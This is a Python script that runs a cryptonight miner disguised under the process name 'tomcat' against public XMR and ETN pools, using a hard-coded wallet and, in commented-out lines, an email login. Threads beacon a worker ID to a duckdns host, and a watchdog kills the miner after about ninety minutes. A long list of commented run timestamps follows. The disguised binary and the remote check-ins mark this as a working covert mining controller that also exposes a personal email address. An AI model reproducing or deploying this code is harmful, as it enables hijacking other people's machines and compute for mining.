import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:04.125813
#2018-02-17 16:48:05.230969
#2018-02-17 18:36:05.315155
#2018-02-17 20:23:06.907881
#2018-02-17 22:10:09.122999
#2018-02-17 23:54:01.858480
#2018-02-18 01:43:07.414702
#2018-02-18 03:31:01.579824
#2018-02-18 05:17:06.174409
#2018-02-18 07:09:05.392562
#2018-02-18 08:57:03.908570
#2018-02-18 10:44:05.245659
#2018-02-18 12:29:06.479061
#2018-02-18 14:17:06.456601
#2018-02-18 16:08:01.907442
#2018-02-18 17:56:05.847494
#2018-02-18 19:43:01.967269
#2018-02-18 21:27:06.602019
#2018-02-18 23:16:02.004446
#2018-02-19 01:02:07.482584
#2018-02-19 02:49:06.408321
#2018-02-19 04:37:01.676509
#2018-02-19 06:21:06.211775
#2018-02-19 08:09:03.976813
#2018-02-19 09:59:04.809830
#2018-02-19 11:48:01.484161
#2018-02-19 13:33:05.335898
#2018-02-19 15:22:09.347071
#2018-02-19 17:11:08.833724
#2018-02-19 18:57:08.551238
#2018-02-19 20:42:08.194425
#2018-02-19 22:29:01.872273
#2018-02-20 00:14:07.820252
#2018-02-20 02:02:01.991142
#2018-02-20 03:52:05.107080
#2018-02-20 05:38:04.204344
#2018-02-20 07:23:05.128897
#2018-02-20 09:08:04.035990
#2018-02-20 10:51:07.598113
#2018-02-20 12:38:06.327788
#2018-02-20 14:24:08.042190
#2018-02-20 16:08:07.116310
#2018-02-20 17:55:07.656520
#2018-02-20 19:45:10.154072
#2018-02-20 21:32:01.918300
#2018-02-20 23:14:02.251343
#2018-02-21 00:58:01.667549
#2018-02-21 02:43:07.817921
#2018-02-21 04:31:06.023295
#2018-02-21 06:18:08.059846
#2018-02-21 08:04:03.721617
#2018-02-21 09:50:07.479924
#2018-02-21 11:40:08.776889
#2018-02-21 13:29:07.917337
#2018-02-21 15:14:05.504155
#2018-02-21 17:04:01.452335
#2018-02-21 18:52:04.934070
#2018-02-21 20:42:05.971651
#2018-02-21 22:28:05.403435
#2018-02-22 00:19:07.489752
#2018-02-22 02:06:04.976228
#2018-02-22 03:52:01.442037
#2018-02-22 05:38:01.735470
#2018-02-22 07:22:01.387827
#2018-02-22 09:10:08.791589
#2018-02-22 10:57:09.073744
#2018-02-22 12:43:06.371180
#2018-02-22 14:29:06.990855
#2018-02-22 16:17:01.379585
#2018-02-22 18:05:01.536929
#2018-02-22 19:54:02.188659
#2018-02-22 21:43:07.104164
#2018-02-22 23:32:01.806908
#2018-02-23 01:20:01.314854
#2018-02-23 03:06:01.459815
#2018-02-23 04:52:07.629052
#2018-02-23 06:38:07.133893
#2018-02-23 08:28:02.104995
#2018-02-23 10:42:05.771694
#2018-02-23 12:36:07.967248
#2018-02-23 14:22:06.610190
#2018-02-23 16:13:07.737927
#2018-02-23 17:58:07.782964
#2018-02-23 19:44:08.594562
#2018-02-23 21:28:01.562005
#2018-02-23 23:18:08.000568
#2018-02-24 01:09:05.539496
#2018-02-24 03:01:07.884059
#2018-02-24 04:48:03.832525
#2018-02-24 06:35:08.111350
#2018-02-24 08:23:06.330863
#2018-02-24 10:07:04.729259
#2018-02-24 12:04:05.034867
#2018-02-24 13:52:07.233554
#2018-02-24 15:38:07.069690
#2018-02-24 17:33:03.943983
#2018-02-24 19:19:04.629941
#2018-02-24 21:09:01.999975
#2018-02-24 23:42:06.344631
#2018-02-25 03:40:08.275493
#2018-02-25 07:25:09.185549